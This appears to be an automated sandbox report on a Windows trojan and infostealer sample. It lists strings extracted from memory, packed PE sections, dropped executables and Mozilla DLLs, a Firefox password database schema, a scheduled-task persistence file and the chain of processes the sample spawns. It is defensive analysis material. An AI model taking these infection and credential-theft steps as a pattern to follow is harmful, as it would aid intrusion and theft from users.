Source: Wf9qnVcbi8.exe, 00000000.00000002.2198516833.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, AECAECFC.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: AKJEGCFBGDHJJJJJKJEC.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: AKJEGCFBGDHJJJJJKJECFCFCAA.0.dr String found in binary or memory: https://support.mozilla.org
Source: AKJEGCFBGDHJJJJJKJECFCFCAA.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: AKJEGCFBGDHJJJJJKJECFCFCAA.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: Wf9qnVcbi8.exe, 00000000.00000002.2198516833.0000000001797000.00000004.00000020.00020000.00000000.sdmp, AKJEGCFBGDHJJJJJKJEC.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: Wf9qnVcbi8.exe, 00000000.00000002.2198516833.0000000001797000.00000004.00000020.00020000.00000000.sdmp, AKJEGCFBGDHJJJJJKJEC.0.dr String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: Wf9qnVcbi8.exe, 00000000.00000002.2198516833.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, AECAECFC.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: AECAECFC.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: AKJEGCFBGDHJJJJJKJECFCFCAA.0.dr String found in binary or memory: https://www.mozilla.org
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.0000000000676000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: AKJEGCFBGDHJJJJJKJECFCFCAA.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.0000000000676000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.0000000000676000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: AKJEGCFBGDHJJJJJKJECFCFCAA.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.0000000000676000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
Source: Wf9qnVcbi8.exe, 00000000.00000003.2137149641.000000002F468000.00000004.00000020.00020000.00000000.sdmp, AKJEGCFBGDHJJJJJKJECFCFCAA.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: AKJEGCFBGDHJJJJJKJECFCFCAA.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Wf9qnVcbi8.exe, 00000000.00000003.2137149641.000000002F468000.00000004.00000020.00020000.00000000.sdmp, AKJEGCFBGDHJJJJJKJECFCFCAA.0.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000071A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: Wf9qnVcbi8.exe, 00000000.00000003.2137149641.000000002F468000.00000004.00000020.00020000.00000000.sdmp, AKJEGCFBGDHJJJJJKJECFCFCAA.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000071A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

System Summary
barindex
PE file contains section with special chars
Source: IDGHDGIDAK.exe.0.dr Static PE information: section name:
Source: IDGHDGIDAK.exe.0.dr Static PE information: section name: .idata
Source: IDGHDGIDAK.exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: explorti.exe.7.dr Static PE information: section name:
Source: explorti.exe.7.dr Static PE information: section name: .idata
Source: explorti.exe.7.dr Static PE information: section name:
PE file has nameless sections
Source: Wf9qnVcbi8.exe Static PE information: section name:
Source: Wf9qnVcbi8.exe Static PE information: section name:
Source: Wf9qnVcbi8.exe Static PE information: section name:
Source: Wf9qnVcbi8.exe Static PE information: section name:
Source: Wf9qnVcbi8.exe Static PE information: section name:
Source: random[1].exe.12.dr Static PE information: section name:
Source: random[1].exe.12.dr Static PE information: section name:
Source: random[1].exe.12.dr Static PE information: section name:
Source: random[1].exe.12.dr Static PE information: section name:
Source: random[1].exe.12.dr Static PE information: section name:
Source: 528307a0ac.exe.12.dr Static PE information: section name:
Source: 528307a0ac.exe.12.dr Static PE information: section name:
Source: 528307a0ac.exe.12.dr Static PE information: section name:
Source: 528307a0ac.exe.12.dr Static PE information: section name:
Source: 528307a0ac.exe.12.dr Static PE information: section name:
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5AB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C5AB700
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5AB8C0 rand_s,NtQueryVirtualMemory, 0_2_6C5AB8C0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5AB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C5AB910
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C54F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C54F280
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5435A0 0_2_6C5435A0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5B545C 0_2_6C5B545C
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C555440 0_2_6C555440
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C585C10 0_2_6C585C10
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C592C10 0_2_6C592C10
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5BAC00 0_2_6C5BAC00
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5B542B 0_2_6C5B542B
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C56D4D0 0_2_6C56D4D0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5564C0 0_2_6C5564C0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C586CF0 0_2_6C586CF0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C54D4E0 0_2_6C54D4E0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C556C80 0_2_6C556C80
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5A34A0 0_2_6C5A34A0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5AC4A0 0_2_6C5AC4A0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C570512 0_2_6C570512
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C56ED10 0_2_6C56ED10
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C55FD00 0_2_6C55FD00
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C580DD0 0_2_6C580DD0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5A85F0 0_2_6C5A85F0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C569E50 0_2_6C569E50
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C583E50 0_2_6C583E50
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C564640 0_2_6C564640
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C592E4E 0_2_6C592E4E
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C54C670 0_2_6C54C670
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5B6E63 0_2_6C5B6E63
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C587E10 0_2_6C587E10
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C595600 0_2_6C595600
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5A9E30 0_2_6C5A9E30
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C54BEF0 0_2_6C54BEF0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C55FEF0 0_2_6C55FEF0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5B76E3 0_2_6C5B76E3
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C565E90 0_2_6C565E90
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5AE680 0_2_6C5AE680
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5A4EA0 0_2_6C5A4EA0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C587710 0_2_6C587710
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C559F00 0_2_6C559F00
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C576FF0 0_2_6C576FF0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C54DFE0 0_2_6C54DFE0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5977A0 0_2_6C5977A0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C568850 0_2_6C568850
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C56D850 0_2_6C56D850
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C58F070 0_2_6C58F070
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C557810 0_2_6C557810
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C58B820 0_2_6C58B820
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C594820 0_2_6C594820
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5B50C7 0_2_6C5B50C7
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C56C0E0 0_2_6C56C0E0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5858E0 0_2_6C5858E0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5760A0 0_2_6C5760A0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C56A940 0_2_6C56A940
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C59B970 0_2_6C59B970
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5BB170 0_2_6C5BB170
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C55D960 0_2_6C55D960
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C585190 0_2_6C585190
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5A2990 0_2_6C5A2990
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C57D9B0 0_2_6C57D9B0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C54C9A0 0_2_6C54C9A0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C589A60 0_2_6C589A60
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C588AC0 0_2_6C588AC0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C561AF0 0_2_6C561AF0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C58E2F0 0_2_6C58E2F0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5BBA90 0_2_6C5BBA90
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C55CAB0 0_2_6C55CAB0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5B2AB0 0_2_6C5B2AB0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5422A0 0_2_6C5422A0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C574AA0 0_2_6C574AA0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C545340 0_2_6C545340
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C55C370 0_2_6C55C370
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C58D320 0_2_6C58D320
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5B53C8 0_2_6C5B53C8
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C54F380 0_2_6C54F380
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_002FE410 12_2_002FE410
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_00333048 12_2_00333048
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_002F4CD0 12_2_002F4CD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_00327D63 12_2_00327D63
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_0033763B 12_2_0033763B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_00341684 12_2_00341684
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_00336EE9 12_2_00336EE9
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_002F4AD0 12_2_002F4AD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_00338700 12_2_00338700
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_0033775B 12_2_0033775B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_00332BB0 12_2_00332BB0
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B0850 13_2_7F4B0850
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B0000 13_2_7F4B0000
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: String function: 6C5894D0 appears 90 times
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: String function: 6C57CBE8 appears 134 times
Sample file is different than original file name gathered from version info
Source: Wf9qnVcbi8.exe, 00000000.00000002.2227283252.000000006C7C5000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs Wf9qnVcbi8.exe
Source: Wf9qnVcbi8.exe, 00000000.00000002.2226960856.000000006C5D2000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs Wf9qnVcbi8.exe
Uses 32bit PE files
Source: Wf9qnVcbi8.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Wf9qnVcbi8.exe Static PE information: Section: ZLIB complexity 0.9996903582317073
Source: Wf9qnVcbi8.exe Static PE information: Section: ZLIB complexity 0.99505615234375
Source: Wf9qnVcbi8.exe Static PE information: Section: ZLIB complexity 0.990234375
Source: IDGHDGIDAK.exe.0.dr Static PE information: Section: ZLIB complexity 0.99822831284153
Source: IDGHDGIDAK.exe.0.dr Static PE information: Section: lwthcuux ZLIB complexity 0.9949199969951923
Source: amadka[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.99822831284153
Source: amadka[1].exe.0.dr Static PE information: Section: lwthcuux ZLIB complexity 0.9949199969951923
Source: explorti.exe.7.dr Static PE information: Section: ZLIB complexity 0.99822831284153
Source: explorti.exe.7.dr Static PE information: Section: lwthcuux ZLIB complexity 0.9949199969951923
Source: random[1].exe.12.dr Static PE information: Section: ZLIB complexity 0.9996903582317073
Source: random[1].exe.12.dr Static PE information: Section: ZLIB complexity 0.99505615234375
Source: random[1].exe.12.dr Static PE information: Section: ZLIB complexity 0.990234375
Source: 528307a0ac.exe.12.dr Static PE information: Section: ZLIB complexity 0.9996903582317073
Source: 528307a0ac.exe.12.dr Static PE information: Section: ZLIB complexity 0.99505615234375
Source: 528307a0ac.exe.12.dr Static PE information: Section: ZLIB complexity 0.990234375
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@17/30@0/3
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5A7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C5A7030
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5284:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4456:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: Wf9qnVcbi8.exe, 00000000.00000002.2212747709.000000001D305000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2227149641.000000006C77F000.00000002.00000001.01000000.00000007.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2226667340.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: Wf9qnVcbi8.exe, 00000000.00000002.2212747709.000000001D305000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2227149641.000000006C77F000.00000002.00000001.01000000.00000007.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2226667340.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Wf9qnVcbi8.exe, 00000000.00000002.2212747709.000000001D305000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2227149641.000000006C77F000.00000002.00000001.01000000.00000007.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2226667340.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: Wf9qnVcbi8.exe, 00000000.00000002.2212747709.000000001D305000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2227149641.000000006C77F000.00000002.00000001.01000000.00000007.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2226667340.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: Wf9qnVcbi8.exe, 00000000.00000002.2212747709.000000001D305000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2227149641.000000006C77F000.00000002.00000001.01000000.00000007.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2226667340.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: Wf9qnVcbi8.exe, 00000000.00000002.2212747709.000000001D305000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2226667340.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: Wf9qnVcbi8.exe, 00000000.00000002.2212747709.000000001D305000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2227149641.000000006C77F000.00000002.00000001.01000000.00000007.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2226667340.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: Wf9qnVcbi8.exe, 00000000.00000003.2074456212.00000000233C8000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000003.2054865895.00000000233D4000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000003.2054865338.00000000016C2000.00000004.00000020.00020000.00000000.sdmp, GCGHJEBGHJKEBFHIJDHC.0.dr, KJDGIJECFIEBFIDHCGHD.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Wf9qnVcbi8.exe, 00000000.00000002.2212747709.000000001D305000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2226667340.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: Wf9qnVcbi8.exe, 00000000.00000002.2212747709.000000001D305000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2226667340.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: Wf9qnVcbi8.exe Virustotal: Detection: 45%
Source: IDGHDGIDAK.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File read: C:\Users\user\Desktop\Wf9qnVcbi8.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Wf9qnVcbi8.exe "C:\Users\user\Desktop\Wf9qnVcbi8.exe"
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CFHDHIJDGC.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe "C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe"
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
